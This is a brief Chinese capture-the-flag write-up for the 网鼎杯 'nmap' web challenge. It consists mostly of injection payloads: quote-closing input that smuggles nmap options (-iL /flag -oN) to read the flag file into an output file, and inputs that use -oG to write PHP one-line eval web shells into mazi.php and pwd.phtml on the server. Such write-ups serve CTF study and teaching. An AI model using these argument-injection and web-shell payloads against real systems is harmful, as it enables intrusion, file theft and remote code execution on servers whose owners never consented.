网鼎杯-nmap

Web
0x01 nmap
查看源码提示：

研究了半天分隔符绕过，后来放弃了，根据题目提示（127.0.01，不用扫外网），尝试扫描/flag并尝试将其输出到1.txt中
-iL /flag -oN 1.txt

尝试失败之后继续尝试闭合一下

127.0.0.1' -iL /flag -oN szgyy.txt '

传马

' <?php @eval($_POST["mazi"]);?> -oG mazi.php '
' <?= @eval($_POST["password"]);?> -oG pwd.phtml '